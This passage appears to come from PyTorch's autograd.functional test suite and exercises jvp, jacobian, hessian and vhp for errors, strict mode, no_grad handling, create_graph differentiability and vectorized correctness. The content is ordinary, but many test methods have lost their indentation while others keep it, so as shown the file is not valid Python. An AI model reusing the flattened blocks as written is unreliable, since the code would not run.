        """strict=True turns silent zero-jvps into errors; strict=False
        returns zeros (or v itself for an identity jacobian) instead."""
        def foo(a):
            return a.detach()
        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone()
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.jvp(foo, inp, v, strict=True)
        res = autogradF.jvp(foo, inp, v, strict=False)
        self._assert_same_struct(res[1], res[0])
        self.assertEqual(res[1].abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
            res = autogradF.jvp(bar, inp, v, strict=True)
        res = autogradF.jvp(bar, inp, v, strict=False)
        self._assert_same_struct(res[1], res[0])
        self.assertEqual(res[1].abs().sum(), 0.)
        # The Jacobian does not depend on the input
        def foo(a):
            return a.clone()
        inp.requires_grad_()
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
            res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
        res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
        self._assert_same_struct(res[1], inp)
        # Identity function: the jvp is just v.
        self.assertEqual(res[1], v)
    def test_jvp_no_grad(self):
        """Under torch.no_grad() jvp still computes values but records no
        graph; create_graph=True overrides no_grad and records one."""
        def reducer(x):
            return x.sum(dim=1)
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        with torch.no_grad():
            res = autogradF.jvp(reducer, inputs, v)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
        self.assertNotEqual(res[1], torch.zeros(4, 4))
        inputs.requires_grad_()
        v.requires_grad_()
        with torch.no_grad():
            res = autogradF.jvp(reducer, inputs, v, create_graph=True)
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        self.assertNotEqual(res[1], torch.zeros(4, 4))
    def test_jvp_output(self):
        """jvp returns (outputs, jvp) detached from any graph by default,
        for single-input, multi-input, and multi-output functions."""
        def reducer(x):
            return x.sum(dim=1)
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        res = autogradF.jvp(reducer, inputs, v)
        self._assert_same_struct(res[1], res[0])
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
        # Multiple inputs, single output.
        def adder(x, y):
            return 2 * x + 3 * y
        inputs = (torch.rand(2), torch.rand(2))
        v = (torch.ones(2), torch.ones(2))
        out, jvp_val = autogradF.jvp(adder, inputs, v)
        self._assert_same_struct(jvp_val, out)
        self.assertIsNone(out.grad_fn)
        self.assertIsNone(jvp_val[0].grad_fn)
        self.assertIsNone(jvp_val[1].grad_fn)
        # Multiple inputs, multiple outputs.
        def adder(x, y):
            return 2 * x + 3 * y, x + y
        inputs = (torch.rand(2), torch.rand(2))
        v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
        out, jvp_val = autogradF.jvp(adder, inputs, v)
        self._assert_same_struct(jvp_val, out)
        self.assertIsNone(out[0].grad_fn)
        self.assertIsNone(out[1].grad_fn)
        self.assertIsNone(jvp_val[0].grad_fn)
        self.assertIsNone(jvp_val[1].grad_fn)
    def test_jvp_scalar(self):
        """jvp handles scalar outputs and scalar inputs (v optional when
        the input is a scalar)."""
        def reducer(x):
            return x.sum()
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        res = autogradF.jvp(reducer, inputs, v)
        self._assert_same_struct(res[0], torch.zeros([]))
        self._assert_same_struct(res[1], res[0])
        def expander(x):
            return x.unsqueeze(0).repeat(4)
        inputs = torch.rand([])
        v = torch.ones([])
        res = autogradF.jvp(expander, inputs, v)
        self._assert_same_struct(res[0], torch.zeros(4))
        self._assert_same_struct(res[1], res[0])
        # v may be omitted entirely for a scalar input.
        res = autogradF.jvp(expander, inputs)
        self._assert_same_struct(res[0], torch.zeros(4))
        self._assert_same_struct(res[1], res[0])
    def test_jvp_create_graph(self):
        """jvp with create_graph=True produces differentiable results that
        must pass gradcheck/gradgradcheck, including when nested inside a
        larger computation."""
        def reducer(x):
            return x.sum(dim=1)
        inputs = torch.rand(2, 2, dtype=torch.double)
        v = torch.ones(2, 2, dtype=torch.double)
        inputs.requires_grad_()
        v.requires_grad_()
        res = autogradF.jvp(reducer, inputs, v, create_graph=True)
        self._assert_same_struct(res[1], res[0])
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
        gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
        def adder(x, y):
            return 2 * x + 3 * y, x * y
        inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
                  torch.rand(2, dtype=torch.double, requires_grad=True))
        v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
             torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
        gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
        gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
        # Nest the jvp call inside a larger computation.
        def foo(*args):
            x, y = args[:2]
            v = args[2:]
            x = x.cos()
            val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
            return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
        gradcheck(foo, inputs + v)
        gradgradcheck(foo, inputs + v)
    def _test_construct_standard_basis_for(self, inputs):
        """The per-input basis blocks must preserve each input's dtype and
        device, and concatenated together must form the identity matrix."""
        numels = tuple(tensor.numel() for tensor in inputs)
        results = autogradF._construct_standard_basis_for(inputs, numels)
        for result, inp in zip(results, inputs):
            self.assertEqual(result.dtype, inp.dtype)
            self.assertEqual(result.device, inp.device)
        # Normalize to CPU/float and stitch the blocks side by side.
        results = torch.cat([result.to(device='cpu', dtype=torch.float)
                             for result in results], dim=1)
        expected = torch.eye(results[0].shape[0], dtype=torch.float)
        self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
    @unittest.skipIf(not TEST_CUDA, "test requires CUDA")
    def test_construct_standard_basis_for_cuda(self):
        """Same as the CPU test, but with inputs split across devices."""
        test_cases = [
            (torch.randn(2), torch.randn(3, device='cuda')),
            (torch.randn(3, device='cuda'), torch.randn(2)),
        ]
        for inputs in test_cases:
            self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
    def _test_jacobian_err_check(self, vectorize):
        """Exercise jacobian's input/output validation, then valid calls
        for single- and multi-input functions."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3)
        def bar(a):
            # Second output is not a Tensor, which jacobian must reject.
            return 3 * a.narrow(0, 0, 3), "bar"
        inp = torch.rand(4)
        with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
            res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
            res = autogradF.jacobian(bar, inp, vectorize=vectorize)
        res = autogradF.jacobian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, foo(inp), inp)
        def foo(a, b):
            return b, 3 * a.narrow(0, 0, 3)
        inp = (torch.rand(4), torch.rand(5))
        res = autogradF.jacobian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, foo(*inp), inp)

    def test_jacobian_err_check(self):
        return self._test_jacobian_err_check(vectorize=False)

    def test_jacobian_err_check_vectorize(self):
        return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
    def test_jacobian_no_grad(self):
        """Under torch.no_grad() the jacobian carries no graph;
        create_graph=True overrides no_grad and records one."""
        def exp_reducer(x):
            return x.exp().sum(dim=1)
        inputs = torch.rand(4, 4)
        with torch.no_grad():
            res = autogradF.jacobian(exp_reducer, inputs)
        self.assertIsNone(res.grad_fn)
        self.assertNotEqual(res, torch.zeros(4, 4))
        with torch.no_grad():
            res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
        self.assertIsNotNone(res.grad_fn)
        self.assertNotEqual(res, torch.zeros(4, 4))
    def _test_jacobian_output(self, vectorize):
        """Check the jacobian's interleaved output structure (and that it is
        detached by default), for single- and multi-input functions."""
        def exp_reducer(x):
            return x.exp().sum(dim=1)
        inputs = torch.rand(4, 4)
        res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
        self.assertIsNone(res.grad_fn)
        def identity(x):
            return x.clone()
        inputs = torch.rand(4)
        res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, identity(inputs), inputs)
        self.assertIsNone(res.grad_fn)
        # Jacobian of the identity map is the identity matrix.
        self.assertEqual(res, torch.eye(4))
        def add_exp_reducer(x, y):
            return (x + y.exp()).sum(dim=1)
        inputs = (torch.rand(4, 4), torch.rand(4, 4))
        res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)

    def test_jacobian_output(self):
        self._test_jacobian_output(vectorize=False)

    def test_jacobian_output_vectorize(self):
        self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
    def _test_jacobian_create_graph(self, vectorize):
        """jacobian with create_graph=True is itself differentiable and must
        pass gradcheck/gradgradcheck, including when its result is consumed
        by a larger computation."""
        def exp_reducer(x):
            return x.exp().sum(dim=1)
        inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
        res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
        self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
        self.assertIsNotNone(res.grad_fn)
        gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        def add_exp_reducer(x, y):
            return (x + y).exp().sum(dim=1)
        inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
                  torch.rand(4, 4, dtype=torch.double, requires_grad=True))
        res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
        self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        # Consume the jacobian inside a larger computation to check that
        # higher-order differentiation flows through the jacobian call.
        def foo(x, y):
            x = x.cos()
            val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
            res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
            res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
            return res
        gradcheck(foo, inputs)
        gradgradcheck(foo, inputs)

    def test_jacobian_create_graph(self):
        self._test_jacobian_create_graph(vectorize=False)

    def test_jacobian_create_graph_vectorize(self):
        self._test_jacobian_create_graph(vectorize=True)
    def _check_jacobian_vectorize_correctness(self, f, inputs, test_forward_ad=True):
        """Vectorized jacobian (backward-mode and, optionally, forward-mode)
        must agree with the non-vectorized reference implementation."""
        expected = autogradF.jacobian(f, inputs, vectorize=False)
        result_backward_mode = autogradF.jacobian(f, inputs, vectorize=True)
        self.assertEqual(result_backward_mode, expected)

        if test_forward_ad:
            result_forward_mode = autogradF.jacobian(f, inputs, strategy="forward-mode", vectorize=True)
            self.assertEqual(result_forward_mode, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
# The Jacobian computed using forward AD has the dtype of the output
# but the Jacobian computed with reverse AD has dtype of input
self._check_jacobian_vectorize_correctness(f, (x, y), test_forward_ad=False)
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
result_forward_mode = autogradF.hessian(f, inputs, outer_jacobian_strategy="forward-mode", vectorize=True)
self.assertEqual(result_forward_mode, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.ones([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
    def _test_hessian_err_check(self, vectorize):
        """Exercise hessian's validation (bad inputs, non-Tensor outputs,
        non-scalar outputs, multiple outputs), then valid calls."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3).exp().sum()
        def bar(a):
            # Second output is not a Tensor.
            return 3 * a.narrow(0, 0, 3), "bar"
        def bar2(a):
            # Output is not a scalar.
            return 3 * a.narrow(0, 0, 3)
        def bar3(a):
            # More than one output.
            return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
        inp = torch.rand(4)
        with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
            res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
            res = autogradF.hessian(bar, inp, vectorize=vectorize)
        err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
        with self.assertRaisesRegex(RuntimeError, err_msg_out):
            res = autogradF.hessian(bar2, inp, vectorize=vectorize)
        with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
            res = autogradF.hessian(bar3, inp, vectorize=vectorize)
        res = autogradF.hessian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, inp, inp)
        def foo(a, b):
            return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
        inp = (torch.rand(4), torch.rand(5))
        res = autogradF.hessian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, inp, inp)

    def test_hessian_err_check(self):
        self._test_hessian_err_check(vectorize=False)

    def test_hessian_err_check_vectorize(self):
        self._test_hessian_err_check(vectorize=True)
    def test_hessian_err_check_strict(self):
        """strict=True raises when the (outer) jacobian is disconnected or
        input-independent; strict=False returns all-zero hessians."""
        def foo(a):
            return a.detach().sum()
        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone().sum()
        def bar2(a):
            # A Linear function for which the jacobian is independent of the input
            return (3 * a).sum()
        inp = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.hessian(foo, inp, strict=True)
        res = autogradF.hessian(foo, inp, strict=False)
        self._assert_interleaved_struct(res, inp, inp)
        self.assertEqual(res.abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
            res = autogradF.hessian(bar, inp, strict=True)
        res = autogradF.hessian(bar, inp, strict=False)
        self._assert_interleaved_struct(res, inp, inp)
        self.assertEqual(res.abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
            res = autogradF.hessian(bar2, inp, strict=True)
        res = autogradF.hessian(bar2, inp, strict=False)
        self._assert_interleaved_struct(res, inp, inp)
        self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
    def test_hessian_no_grad(self):
        """Under torch.no_grad() the hessian carries no graph;
        create_graph=True overrides no_grad and records one."""
        def pow_reducer(x):
            return x.pow(3).sum()
        inputs = torch.rand(2, 2)
        with torch.no_grad():
            res = autogradF.hessian(pow_reducer, inputs)
        self.assertIsNone(res[0][0].grad_fn)
        self.assertIsNone(res[0][1].grad_fn)
        self.assertIsNone(res[1][0].grad_fn)
        self.assertIsNone(res[1][1].grad_fn)
        self.assertNotEqual(res, torch.zeros(2, 2, 2))
        with torch.no_grad():
            res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
        self.assertIsNotNone(res[0][0].grad_fn)
        self.assertIsNotNone(res[0][1].grad_fn)
        self.assertIsNotNone(res[1][0].grad_fn)
        self.assertIsNotNone(res[1][1].grad_fn)
        self.assertNotEqual(res, torch.zeros(2, 2, 2))
    def _test_hessian_output(self, vectorize):
        """Hessian outputs have the interleaved structure of inputs x inputs
        and are detached from any graph by default."""
        def pow_reducer(x):
            return x.pow(3).sum()
        inputs = torch.rand(2, 2)
        res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, inputs, inputs)
        self.assertIsNone(res.grad_fn)
        def add_pow_reducer(x, y):
            return (x + y).pow(3).sum()
        inputs = (torch.rand(2, 2), torch.rand(2, 2))
        res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, inputs, inputs)
        self.assertIsNone(res[0][0].grad_fn)
        self.assertIsNone(res[0][1].grad_fn)
        self.assertIsNone(res[1][0].grad_fn)
        self.assertIsNone(res[1][1].grad_fn)

    def test_hessian_output(self):
        self._test_hessian_output(vectorize=False)

    def test_hessian_output_vectorize(self):
        self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
    # Non-vectorized variant of the shared scalar-hessian check.
    return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
    # Vectorized (vmap-based) variant of the shared scalar-hessian check.
    return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
    # Shared body: with create_graph=True the hessian itself must be
    # differentiable (checked via gradcheck/gradgradcheck).
    def pow_reducer(x):
        return x.pow(3).sum()
    inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
    res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, inputs, inputs)
    self.assertIsNotNone(res.grad_fn)

    gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
    gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)

    def add_pow_reducer(x, y):
        return (x + y).pow(3).sum()
    inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
              torch.rand(2, 2, dtype=torch.double, requires_grad=True))
    res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, inputs, inputs)
    self.assertIsNotNone(res[0][0].grad_fn)
    self.assertIsNotNone(res[0][1].grad_fn)
    self.assertIsNotNone(res[1][0].grad_fn)
    self.assertIsNotNone(res[1][1].grad_fn)

    def flatten(inp):
        # gradcheck needs a flat tuple of Tensors, not a tuple of tuples.
        return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)

    gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
    gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)

    def foo(x, y):
        # Use the hessian result inside a larger differentiable computation.
        # NB: for a 2-input function the hessian is a 2x2 tuple of tuples;
        # unpacking gives its two rows here.
        x = x.cos()
        val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)

        res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
        res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
        return res

    gradcheck(foo, inputs)
    gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
    # Non-vectorized variant of the shared create_graph hessian check.
    self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
    # Vectorized (vmap-based) variant of the shared create_graph hessian check.
    self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
    # Validation errors raised by autogradF.vhp for malformed inputs/outputs/v.
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    def bar(a):
        # Non-Tensor element in the outputs -> TypeError.
        return 3 * a.narrow(0, 0, 3), "bar"

    def bar2(a):
        # Non-scalar (multi-element) output -> RuntimeError.
        return 3 * a.narrow(0, 0, 3)

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
        res = autogradF.vhp(foo, (inp, 2), v)

    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
        res = autogradF.vhp(bar, inp, v)

    err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
    with self.assertRaisesRegex(RuntimeError, err_msg_out):
        res = autogradF.vhp(bar2, inp, v)

    with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
        res = autogradF.vhp(foo, inp, torch.rand(5))

    with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
        res = autogradF.vhp(foo, inp, (v, 2))

    # Valid call with a single Tensor input.
    res = autogradF.vhp(foo, inp, v)
    self._assert_same_struct(res[1], inp)

    def foo(a, b):
        return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
    inp = (torch.rand(4), torch.rand(5))
    v = (torch.rand(4), torch.rand(5))

    # Valid call with a tuple-of-Tensors input.
    res = autogradF.vhp(foo, inp, v)
    self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
    # strict=True must raise when the vhp would silently be zero;
    # strict=False returns zeros instead.
    def foo(a):
        # Output does not require gradients at all.
        return a.detach().sum()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone().sum()

    def bar2(a):
        # A Linear function for which the jacobian is independent of the input
        return (3 * a).sum()

    inp = torch.rand(4)
    v = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.vhp(foo, inp, v, strict=True)
    res = autogradF.vhp(foo, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
        res = autogradF.vhp(bar, inp, v, strict=True)
    res = autogradF.vhp(bar, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
        res = autogradF.vhp(bar2, inp, v, strict=True)
    res = autogradF.vhp(bar2, inp, v, strict=False)
    self._assert_same_struct(res[1], inp)
    self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
    # vhp returns (func_output, vhp) with no autograd graph by default.
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()
    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    res = autogradF.vhp(foo, inputs, v)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNone(res[0].grad_fn)
    self.assertIsNone(res[1].grad_fn)

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
    inputs = (torch.rand(3), torch.rand(4))
    v = (torch.ones(3), torch.ones(4))
    out, vhp_val = autogradF.vhp(bar, inputs, v)
    self._assert_same_struct(vhp_val, inputs)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(vhp_val[0].grad_fn)
    self.assertIsNone(vhp_val[1].grad_fn)
